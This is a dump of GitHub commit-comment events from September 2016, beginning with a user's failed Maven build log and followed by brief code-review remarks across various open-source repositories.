{"id":"4538321394","type":"CommitCommentEvent","actor":{"login":"alexwang03"},"repo":{"name":"seand9/lvm-openstack-adapters"},"payload":{"comment":{"id":18958163,"position":null,"line":null,"path":null,"commit_id":"208db6c1db19c792f9bdef8cf8915a701ac6ef0e","created_at":"2016-09-09T06:11:52Z","updated_at":"2016-09-09T06:11:52Z","body":"Hi Support,\r\nl get the error as below when l build the package with maven ,could you please help check the error info.Thanks in advance!\r\n\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n#### mvn -X clean package\r\nApache Maven 3.0.5 (Red Hat 3.0.5-16)\r\nMaven home: /usr/share/maven\r\nJava version: 1.7.0_111, vendor: Oracle Corporation\r\nJava home: /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.111-2.6.7.2.el7_2.x86_64/jre\r\nDefault locale: en_US, platform encoding: UTF-8\r\nOS name: \"linux\", version: \"3.10.0-327.22.2.el7.x86_64\", arch: \"amd64\", family: \"unix\"\r\n[INFO] Error stacktraces are turned on.\r\n[DEBUG] Reading global settings from /usr/share/maven/conf/settings.xml\r\n[DEBUG] Reading user settings from /root/.m2/settings.xml\r\n[DEBUG] Using local repository at /root/.m2/repository\r\n[DEBUG] Using manager EnhancedLocalRepositoryManager with priority 10 for /root/.m2/repository\r\n[INFO] Scanning for projects...\r\n[DEBUG] Extension realms for project com.sap.vcm:LVMAdaptersParent:pom:1.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging pom from ClassRealm[plexus.core, parent: null]\r\n[DEBUG] Extension realms for project com.sap.vcm:VirtualizationAPIs:jar:1.0.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging jar from ClassRealm[plexus.core, parent: null]\r\n[DEBUG] Extension realms for project com.sap.vcm:LVMAdapters:war:1.0.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging war from ClassRealm[plexus.core, parent: null]\r\n[DEBUG] Extension realms for project com.sap.vcm:LVMAdaptersApp:ear:1.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging ear from ClassRealm[plexus.core, parent: null]\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Reactor Build Order:\r\n[INFO] \r\n[INFO] VirtualizationAPIs\r\n[INFO] LVMAdapters\r\n[INFO] LVMAdaptersApp\r\n[INFO] LVM Openstack Adapter Parent Project\r\n[DEBUG] === REACTOR BUILD PLAN ================================================\r\n[DEBUG] Project: com.sap.vcm:VirtualizationAPIs:jar:1.0.0\r\n[DEBUG] Tasks:   [clean, package]\r\n[DEBUG] Style:   Regular\r\n[DEBUG] -----------------------------------------------------------------------\r\n[DEBUG] Project: com.sap.vcm:LVMAdapters:war:1.0.0\r\n[DEBUG] Tasks:   [clean, package]\r\n[DEBUG] Style:   Regular\r\n[DEBUG] -----------------------------------------------------------------------\r\n[DEBUG] Project: com.sap.vcm:LVMAdaptersApp:ear:1.0\r\n[DEBUG] Tasks:   [clean, package]\r\n[DEBUG] Style:   Regular\r\n[DEBUG] -----------------------------------------------------------------------\r\n[DEBUG] Project: com.sap.vcm:LVMAdaptersParent:pom:1.0\r\n[DEBUG] Tasks:   [clean, package]\r\n[DEBUG] Style:   Regular\r\n[DEBUG] =======================================================================\r\n[INFO]                                                                         \r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Building VirtualizationAPIs 1.0.0\r\n[INFO] ------------------------------------------------------------------------\r\n[DEBUG] Lifecycle default -> [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]\r\n[DEBUG] Lifecycle clean -> [pre-clean, clean, post-clean]\r\n[DEBUG] Lifecycle site -> [pre-site, site, post-site, site-deploy]\r\n[DEBUG] Lifecycle default -> [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]\r\n[DEBUG] Lifecycle clean -> [pre-clean, clean, post-clean]\r\n[DEBUG] Lifecycle site -> [pre-site, site, post-site, site-deploy]\r\n[DEBUG] Using connector WagonRepositoryConnector with priority 0 for http://repo.maven.apache.org/maven2\r\nDownloading: http://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/2.4.1/maven-clean-plugin-2.4.1.pom\r\n[DEBUG] Writing resolution tracking file /root/.m2/repository/org/apache/maven/plugins/maven-clean-plugin/2.4.1/maven-clean-plugin-2.4.1.pom.lastUpdated\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Reactor Summary:\r\n[INFO] \r\n[INFO] VirtualizationAPIs ................................ FAILURE [22.115s]\r\n[INFO] LVMAdapters ....................................... SKIPPED\r\n[INFO] LVMAdaptersApp .................................... SKIPPED\r\n[INFO] LVM Openstack Adapter Parent Project .............. SKIPPED\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] BUILD FAILURE\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Total time: 22.345s\r\n[INFO] Finished at: Fri Sep 09 14:08:34 CST 2016\r\n[INFO] Final Memory: 7M/178M\r\n[INFO] ------------------------------------------------------------------------\r\n[ERROR] Plugin org.apache.maven.plugins:maven-clean-plugin:2.4.1 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host -> [Help 1]\r\norg.apache.maven.plugin.PluginResolutionException: Plugin org.apache.maven.plugins:maven-clean-plugin:2.4.1 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1\r\n\tat org.apache.maven.plugin.internal.DefaultPluginDependenciesResolver.resolve(DefaultPluginDependenciesResolver.java:129)\r\n\tat org.apache.maven.plugin.internal.DefaultMavenPluginManager.getPluginDescriptor(DefaultMavenPluginManager.java:142)\r\n\tat org.apache.maven.plugin.internal.DefaultMavenPluginManager.getMojoDescriptor(DefaultMavenPluginManager.java:261)\r\n\tat org.apache.maven.plugin.DefaultBuildPluginManager.getMojoDescriptor(DefaultBuildPluginManager.java:185)\r\n\tat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.setupMojoExecution(DefaultLifecycleExecutionPlanCalculator.java:152)\r\n\tat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.setupMojoExecutions(DefaultLifecycleExecutionPlanCalculator.java:139)\r\n\tat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.calculateExecutionPlan(DefaultLifecycleExecutionPlanCalculator.java:116)\r\n\tat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.calculateExecutionPlan(DefaultLifecycleExecutionPlanCalculator.java:129)\r\n\tat org.apache.maven.lifecycle.internal.BuilderCommon.resolveBuildPlan(BuilderCommon.java:92)\r\n\tat org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject(LifecycleModuleBuilder.java:81)\r\n\tat org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject(LifecycleModuleBuilder.java:59)\r\n\tat org.apache.maven.lifecycle.internal.LifecycleStarter.singleThreadedBuild(LifecycleStarter.java:183)\r\n\tat org.apache.maven.lifecycle.internal.LifecycleStarter.execute(LifecycleStarter.java:161)\r\n\tat org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java:320)\r\n\tat org.apache.maven.DefaultMaven.execute(DefaultMaven.java:156)\r\n\tat org.apache.maven.cli.MavenCli.execute(MavenCli.java:537)\r\n\tat org.apache.maven.cli.MavenCli.doMain(MavenCli.java:196)\r\n\tat org.apache.maven.cli.MavenCli.main(MavenCli.java:141)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:606)\r\n\tat org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced(Launcher.java:290)\r\n\tat org.codehaus.plexus.classworlds.launcher.Launcher.launch(Launcher.java:230)\r\n\tat org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode(Launcher.java:414)\r\n\tat org.codehaus.plexus.classworlds.launcher.Launcher.main(Launcher.java:357)\r\nCaused by: org.sonatype.aether.resolution.ArtifactDescriptorException: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1\r\n\tat org.apache.maven.repository.internal.DefaultArtifactDescriptorReader.loadPom(DefaultArtifactDescriptorReader.java:296)\r\n\tat org.apache.maven.repository.internal.DefaultArtifactDescriptorReader.readArtifactDescriptor(DefaultArtifactDescriptorReader.java:186)\r\n\tat org.sonatype.aether.impl.internal.DefaultRepositorySystem.readArtifactDescriptor(DefaultRepositorySystem.java:279)\r\n\tat org.apache.maven.plugin.internal.DefaultPluginDependenciesResolver.resolve(DefaultPluginDependenciesResolver.java:115)\r\n\t... 25 more\r\nCaused by: org.sonatype.aether.resolution.ArtifactResolutionException: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host\r\n\tat org.sonatype.aether.impl.internal.DefaultArtifactResolver.resolve(DefaultArtifactResolver.java:538)\r\n\tat org.sonatype.aether.impl.internal.DefaultArtifactResolver.resolveArtifacts(DefaultArtifactResolver.java:216)\r\n\tat org.sonatype.aether.impl.internal.DefaultArtifactResolver.resolveArtifact(DefaultArtifactResolver.java:193)\r\n\tat org.apache.maven.repository.internal.DefaultArtifactDescriptorReader.loadPom(DefaultArtifactDescriptorReader.java:281)\r\n\t... 28 more\r\nCaused by: org.sonatype.aether.transfer.ArtifactTransferException: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host\r\n\tat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$4.wrap(WagonRepositoryConnector.java:951)\r\n\tat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$4.wrap(WagonRepositoryConnector.java:939)\r\n\tat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$GetTask.run(WagonRepositoryConnector.java:669)\r\n\tat org.sonatype.aether.util.concurrency.RunnableErrorForwarder$1.run(RunnableErrorForwarder.java:60)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)\r\n\tat java.lang.Thread.run(Thread.java:745)\r\nCaused by: org.apache.maven.wagon.TransferFailedException: No route to host\r\n\tat org.apache.maven.wagon.shared.http4.AbstractHttpClientWagon.fillInputData(AbstractHttpClientWagon.java:892)\r\n\tat org.apache.maven.wagon.StreamWagon.getInputStream(StreamWagon.java:116)\r\n\tat org.apache.maven.wagon.StreamWagon.getIfNewer(StreamWagon.java:88)\r\n\tat org.apache.maven.wagon.StreamWagon.get(StreamWagon.java:61)\r\n\tat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$GetTask.run(WagonRepositoryConnector.java:601)\r\n\t... 4 more\r\nCaused by: java.net.NoRouteToHostException: No route to host\r\n\tat java.net.PlainSocketImpl.socketConnect(Native Method)\r\n\tat java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339)\r\n\tat java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200)\r\n\tat java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182)\r\n\tat java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)\r\n\tat java.net.Socket.connect(Socket.java:579)\r\n\tat org.apache.http.conn.scheme.PlainSocketFactory.connectSocket(PlainSocketFactory.java:127)\r\n\tat org.apache.http.impl.conn.DefaultClientConnectionOperator.openConnection(DefaultClientConnectionOperator.java:180)\r\n\tat org.apache.http.impl.conn.ManagedClientConnectionImpl.open(ManagedClientConnectionImpl.java:294)\r\n\tat org.apache.http.impl.client.DefaultRequestDirector.tryConnect(DefaultRequestDirector.java:643)\r\n\tat org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:479)\r\n\tat org.apache.http.impl.client.AbstractHttpClient.execute(AbstractHttpClient.java:906)\r\n\tat org.apache.http.impl.client.AbstractHttpClient.execute(AbstractHttpClient.java:805)\r\n\tat org.apache.maven.wagon.shared.http4.AbstractHttpClientWagon.execute(AbstractHttpClientWagon.java:746)\r\n\tat org.apache.maven.wagon.shared.http4.AbstractHttpClientWagon.fillInputData(AbstractHttpClientWagon.java:886)\r\n\t... 8 more\r\n[ERROR] \r\n[ERROR] \r\n[ERROR] For more information about the errors and possible solutions, please read the following articles:\r\n[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginResolutionException"}},"created_at":"2016-09-09T06:11:52Z"}
{"id":"4538323256","type":"CommitCommentEvent","actor":{"login":"ST-DDT"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":18958168,"position":8,"line":483,"path":"src/main/java/org/spongepowered/common/world/WorldManager.java","commit_id":"74cb2d976b5fcf167f23153fd39c91556b593119","created_at":"2016-09-09T06:12:38Z","updated_at":"2016-09-09T06:12:38Z","body":"Shouldnt this be in a new try finally block?"}},"created_at":"2016-09-09T06:12:38Z"}
{"id":"4538328546","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"tomolimo/glpi"},"payload":{"comment":{"id":18958181,"position":4,"line":2517,"path":"inc/commondbtm.class.php","commit_id":"6d5a6164c70b80c7184478dbbb29240c3bcc5338","created_at":"2016-09-09T06:14:41Z","updated_at":"2016-09-09T06:14:41Z","body":"Maybe we should also test that existing fileds['id'] is equal to $ID? This way, we can be absolutely sure there is no difference possible with the old way."}},"created_at":"2016-09-09T06:14:41Z"}
{"id":"4538328623","type":"CommitCommentEvent","actor":{"login":"magol"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":18958183,"position":25,"line":58,"path":"DokanNet/DokanNet.net4.0.csproj","commit_id":"96e2fa3dea7f8a85243b322708ffbe40596f1023","created_at":"2016-09-09T06:14:43Z","updated_at":"2016-09-09T06:14:43Z","body":"What I the purpose of DEBUGNET40?  \r\nNET40 is missing "}},"created_at":"2016-09-09T06:14:43Z"}
{"id":"4538334596","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18958189,"position":null,"line":null,"path":null,"commit_id":"5862e54c1da8c8589ddb5540db8ea627ded2ed90","created_at":"2016-09-09T06:16:57Z","updated_at":"2016-09-09T06:16:57Z","body":"5952 sessions and 29905 users"}},"created_at":"2016-09-09T06:16:57Z"}
{"id":"4538335522","type":"CommitCommentEvent","actor":{"login":"qingyoucao2016"},"repo":{"name":"qingyoucao2016/hello-world1"},"payload":{"comment":{"id":18958193,"position":null,"line":null,"path":null,"commit_id":"735f22bcfaf1bbfce9e63059dff3759f49051ccc","created_at":"2016-09-09T06:17:17Z","updated_at":"2016-09-09T06:17:17Z","body":"又看了一次"}},"created_at":"2016-09-09T06:17:17Z"}
{"id":"4538335947","type":"CommitCommentEvent","actor":{"login":"magol"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":18958197,"position":7,"line":59,"path":"DokanNet/DokanNet.net4.6.csproj","commit_id":"96e2fa3dea7f8a85243b322708ffbe40596f1023","created_at":"2016-09-09T06:17:26Z","updated_at":"2016-09-09T06:17:26Z","body":"NET46 is missing "}},"created_at":"2016-09-09T06:17:26Z"}
{"id":"4538336222","type":"CommitCommentEvent","actor":{"login":"tomolimo"},"repo":{"name":"tomolimo/glpi"},"payload":{"comment":{"id":18958199,"position":4,"line":2517,"path":"inc/commondbtm.class.php","commit_id":"6d5a6164c70b80c7184478dbbb29240c3bcc5338","created_at":"2016-09-09T06:17:31Z","updated_at":"2016-09-09T06:17:31Z","body":"ok, good idea"}},"created_at":"2016-09-09T06:17:31Z"}
{"id":"4538338810","type":"CommitCommentEvent","actor":{"login":"BergWerkGIS"},"repo":{"name":"naturalatlas/node-gdal"},"payload":{"comment":{"id":18958201,"position":31,"line":217,"path":"scripts/build-appveyor.bat","commit_id":"c80aa913993fd40e2f4ab4723b1e6d44ae8f8858","created_at":"2016-09-09T06:18:20Z","updated_at":"2016-09-09T06:18:20Z","body":"@springmeyer `\"%CM%\" == \"%CM:[publish binary]=%\"` is very brittle and often breaks if there are some \"strange\" characters (`\\`, `/`, `:`, ...) in the commit message.\r\nThat's why there is https://github.com/naturalatlas/node-gdal/blob/master/scripts/parse-commit-message.ps1\r\nDon't know when/how/why this got lost, but that's the way I suggest to parse commit messages on Windows.\r\n\r\nA more flexible version is used with mapnik (https://github.com/mapnik/mapnik/blob/master/scripts/parse-commit-message.ps1).\r\nCalling it would look like this: https://github.com/mapnik/mapnik/blob/094994ef540353b846490bf5c0dd127d00740dcb/scripts/build-appveyor.bat#L16"}},"created_at":"2016-09-09T06:18:20Z"}
{"id":"4538340467","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":18958203,"position":7,"line":59,"path":"DokanNet/DokanNet.net4.6.csproj","commit_id":"96e2fa3dea7f8a85243b322708ffbe40596f1023","created_at":"2016-09-09T06:18:43Z","updated_at":"2016-09-09T06:18:43Z","body":"NET46_OR_GREATER is not enough ?\r\n"}},"created_at":"2016-09-09T06:18:43Z"}
{"id":"4538341529","type":"CommitCommentEvent","actor":{"login":"ulumulu1510"},"repo":{"name":"MassiveCraft/Factions"},"payload":{"comment":{"id":18958205,"position":null,"line":null,"path":null,"commit_id":"717ff2eff987d9c7f2e32f74487e4af5ba01e2de","created_at":"2016-09-09T06:19:00Z","updated_at":"2016-09-09T06:19:00Z","body":"First off, thank you for sending a PR :).\r\n\r\nAs you might know, we work in iteration's and give feedback on PR's till they are ready for getting pulled. This involve's probably quite a few line and general comments, bit rest assured: We are very much interested in you getting this commit through. :D\r\n\r\nIf you do not know what we call \"an iteration\", it is as follows:\r\n1) You commit your PR\r\n2) We add line comments and point out things we'd like to have changed.\r\n3) You change these in your workspace.\r\n4) Ammend your commit (rebate it onto the master branch if necessary) and post the new commit link in your PR comments.  :)\r\n5) Repeat  2-4 till the commit is ready.\r\n6) We fetch your changes and integrate them into the master.\r\n\r\nIf you have questions to any of those steps, don'the hesitate to ask me :)."}},"created_at":"2016-09-09T06:19:00Z"}
{"id":"4538341718","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"pmcleish/jmmserver"},"payload":{"comment":{"id":18958206,"position":null,"line":null,"path":null,"commit_id":"bf3ed8aea103b8517109f50c0a1ff16b9c6b5a65","created_at":"2016-09-09T06:19:04Z","updated_at":"2016-09-09T06:19:04Z","body":"I like the way you did it better. I need to sleep more. It helps me care if code is written well"}},"created_at":"2016-09-09T06:19:04Z"}
{"id":"4538349321","type":"CommitCommentEvent","actor":{"login":"JordiPolo"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":18958220,"position":null,"line":null,"path":null,"commit_id":"786da1ffe075d50a26af885f4baf9589978c45c2","created_at":"2016-09-09T06:21:36Z","updated_at":"2016-09-09T06:21:36Z","body":"There are two things that surprise me here:\r\n- I thought Elixir tended to avoid wrapping Erlang functions just because (for instance there is no wrapping of math functions)\r\n- Why in Kernel vs inside some module? IMHO one of the nice things about Elixir is how tidy everything is. I can not see why generating random numbers belongs to the core of a programming language"}},"created_at":"2016-09-09T06:21:36Z"}
{"id":"4538350118","type":"CommitCommentEvent","actor":{"login":"HeadWar"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":18958221,"position":null,"line":null,"path":null,"commit_id":"f84b92776632daa36528dd2ca14256c2d1cd80ae","created_at":"2016-09-09T06:21:52Z","updated_at":"2016-09-09T06:21:52Z","body":"Used consistently, I'm guessing it's short for skilllevel."}},"created_at":"2016-09-09T06:21:52Z"}
{"id":"4538350431","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":18958222,"position":null,"line":null,"path":null,"commit_id":"daabb6bce833c27f1b253a8a25fad4f0d71c0d7c","created_at":"2016-09-09T06:21:59Z","updated_at":"2016-09-09T06:21:59Z","body":"test comment to check on title."}},"created_at":"2016-09-09T06:21:59Z"}
{"id":"4538351665","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958227,"position":20,"line":20,"path":"src/Dispatch.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:22:25Z","updated_at":"2016-09-09T06:22:25Z","body":"Give a short explanation how to use this—this helps only if you want, like we do in elm-mdl, to make an API where users specify options as lists of things and we need to accumulate handlers for different events.\r\n\r\nConsider also linking directly specific lines in `Options.elm` and `Internal.elm` in elm-mdl (remember to link a specific commit so line numbers don't drift)."}},"created_at":"2016-09-09T06:22:25Z"}
{"id":"4538352696","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958230,"position":9,"line":9,"path":"src/Dispatch.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:22:48Z","updated_at":"2016-09-09T06:22:48Z","body":"Don't call it \"utility module\": it's the main module of Dispatch :)\r\n"}},"created_at":"2016-09-09T06:22:48Z"}
{"id":"4538353963","type":"CommitCommentEvent","actor":{"login":"tunturn"},"repo":{"name":"tunturn/z3concept"},"payload":{"comment":{"id":18958232,"position":null,"line":null,"path":null,"commit_id":"8deb61527b61d1ffc01ee210a075075de76832d7","created_at":"2016-09-09T06:23:16Z","updated_at":"2016-09-09T06:23:16Z","body":"bootloops"}},"created_at":"2016-09-09T06:23:16Z"}
{"id":"4538354429","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958234,"position":10,"line":10,"path":"examples/example-1.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:23:26Z","updated_at":"2016-09-09T06:23:26Z","body":"Move the boilerplate to the bottom so that the interesting stuff comes first. "}},"created_at":"2016-09-09T06:23:26Z"}
{"id":"4538356634","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18958238,"position":null,"line":null,"path":null,"commit_id":"31653a5006165e86249fa6c3215e34c4ed8b3693","created_at":"2016-09-09T06:24:15Z","updated_at":"2016-09-09T06:24:15Z","body":"Huh? Gotta disagree on that..."}},"created_at":"2016-09-09T06:24:15Z"}
{"id":"4538357102","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18958241,"position":null,"line":null,"path":null,"commit_id":"6dda1bd1f9f8761744cdd95e921bbcaa50bd66e3","created_at":"2016-09-09T06:24:27Z","updated_at":"2016-09-09T06:24:27Z","body":"i'm use this version all fine \r\n\r\n1.what windows you use?\r\n2.did you patch?\r\n3.lang eng?"}},"created_at":"2016-09-09T06:24:27Z"}
{"id":"4538360960","type":"CommitCommentEvent","actor":{"login":"leozilla"},"repo":{"name":"xap/xap"},"payload":{"comment":{"id":18958248,"position":5,"line":355,"path":"xap-core/xap-datagrid/src/main/java/net/jini/discovery/LookupLocatorDiscovery.java","commit_id":"82bd3a16c56233b9303497becd8ddec2545d2933","created_at":"2016-09-09T06:25:47Z","updated_at":"2016-09-09T06:25:47Z","body":"seems wrong, should be 1000, 5000, 10.000, 20.000"}},"created_at":"2016-09-09T06:25:47Z"}
{"id":"4538367386","type":"CommitCommentEvent","actor":{"login":"rfinz"},"repo":{"name":"systemed/forest_roads"},"payload":{"comment":{"id":18958259,"position":82,"line":82,"path":"forest_roads.mss","commit_id":"44591bcca3e1bf98b2b49c9ac29eb7bea6ff6b6b","created_at":"2016-09-09T06:27:36Z","updated_at":"2016-09-09T06:27:36Z","body":"hey, just out of curiosity, where did you find the POI codes for the recreation layer? been having a hell of a time"}},"created_at":"2016-09-09T06:27:36Z"}
{"id":"4538367979","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"anelhadzich/zadace"},"payload":{"comment":{"id":18958264,"position":null,"line":null,"path":null,"commit_id":"530ba5b1b0cdd078bd9701a34fd6d2daa5eeda2d","created_at":"2016-09-09T06:27:48Z","updated_at":"2016-09-09T06:27:48Z","body":"MealTableViewController.swift\r\n<img width=\"308\" alt=\"screen shot 2016-09-09 at 08 20 23\" src=\"https://cloud.githubusercontent.com/assets/6802263/18377277/7417ca44-7666-11e6-8178-8b32152d38c9.png\">\r\n- u navigation bar title ti pise sarma\r\n- zvjezdice preklapaju Delete button\r\n\r\nMealViewController\r\n<img width=\"309\" alt=\"screen shot 2016-09-09 at 08 23 28\" src=\"https://cloud.githubusercontent.com/assets/6802263/18377331/babecb3c-7666-11e6-9147-76eb06150129.png\">\r\nzvjezdice trebaju bit u sredini ekrana\r\ntreba biti moguce da se i ovdje postavi rating\r\nkad uradim edit, tj kad otvorim vec kreirano jelo ne mogu mu nista promjeniti\r\n\r\novaj dio nije potreban: \r\n else if segue.identifier == \"AddItem\" {\r\n            print(\"Adding new meal.\")\r\n        }\r\n\r\novdje nemoj uradi i if let indexPath = tableView.indexPathForCell(selectedMealCell)\r\n   // In a storyboard-based application, you will often want to do a little preparation before navigation\r\n    override func prepareForSegue(segue: UIStoryboardSegue, sender: AnyObject?) {\r\n        if segue.identifier == \"ShowDetail\" {\r\n            let mealDetailViewController = segue.destinationViewController as! MealViewController\r\n            if let selectedMealCell = sender as? MealTableViewCell {\r\n                let indexPath = tableView.indexPathForCell(selectedMealCell)!\r\n                let selectedMeal = meals[indexPath.row]\r\n                mealDetailViewController.meal = selectedMeal\r\n            }\r\n        }\r\n        else if segue.identifier == \"AddItem\" {\r\n            print(\"Adding new meal.\")\r\n        }\r\n\r\nostalo je ok"}},"created_at":"2016-09-09T06:27:48Z"}
{"id":"4538368770","type":"CommitCommentEvent","actor":{"login":"debois"},"repo":{"name":"vipentti/elm-dispatch"},"payload":{"comment":{"id":18958268,"position":25,"line":25,"path":"examples/example-1.elm","commit_id":"14f2b16ac0ed22e8d4781b162e3787ad663ebcc8","created_at":"2016-09-09T06:28:06Z","updated_at":"2016-09-09T06:28:06Z","body":"A good example focuses ruthlessly on what its demonstrating. Preferably, the concept you're demonstrating occurs exactly once and everything else is as short and trivial as possible. \r\n\r\nThis example is close, but I think you could help readers by having only one button; that way, readers won't be distracted by the `idx` mechanics. The additional two buttons do not help making the concepts easier to understand. "}},"created_at":"2016-09-09T06:28:06Z"}
{"id":"4538370684","type":"CommitCommentEvent","actor":{"login":"devil8543210"},"repo":{"name":"devil8543210/20160909"},"payload":{"comment":{"id":18958279,"position":null,"line":null,"path":null,"commit_id":"915ede20c29d026d2c6043fcd147c07a2cec62fb","created_at":"2016-09-09T06:28:45Z","updated_at":"2016-09-09T06:28:45Z","body":"123"}},"created_at":"2016-09-09T06:28:45Z"}
{"id":"4538371317","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18958284,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T06:28:58Z","updated_at":"2016-09-09T06:28:58Z","body":"＞例外を「意図的に」発生させる命令になります。\r\nということは、下記のようなエラーがでるのが即ち正常な反応ということでしょうか？？\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18377412/f5831c6a-76a1-11e6-82db-6e08efed262b.png)\r\n\r\n『throw new Exception('エラーが発生しました');』は説明の為に記載されていたコードという形ですか？\r\n"}},"created_at":"2016-09-09T06:28:58Z"}
{"id":"4538374033","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18958292,"position":null,"line":null,"path":null,"commit_id":"9b4e0a1a1373f8e1fa451de2d1d3b411d52ed431","created_at":"2016-09-09T06:29:52Z","updated_at":"2016-09-09T06:29:52Z","body":"@ilteroi and @Iamblichos,\r\n\r\nMade some more aggressive changes to the functionality of military AI checks for ocean/water travel. The traderoutepath caches just weren't cutting it (as they were limited by distance and danger). If there's a better solution I'm up for it, but the changes above address the key problem with AI passivity on land.\r\n\r\nI've also got my new espionage AI element included (great work heists), so that's fun. We need to test that.\r\n\r\nFinally, I reverted a small part of the RNG from 8-2 and put it back into the DLL. That's the only major RNG change I could see from 8-2, and people said that 8-2 was quite stable."}},"created_at":"2016-09-09T06:29:52Z"}
{"id":"4538374576","type":"CommitCommentEvent","actor":{"login":"tctai"},"repo":{"name":"devil8543210/20160909"},"payload":{"comment":{"id":18958294,"position":null,"line":null,"path":null,"commit_id":"915ede20c29d026d2c6043fcd147c07a2cec62fb","created_at":"2016-09-09T06:30:01Z","updated_at":"2016-09-09T06:30:01Z","body":"1234"}},"created_at":"2016-09-09T06:30:01Z"}
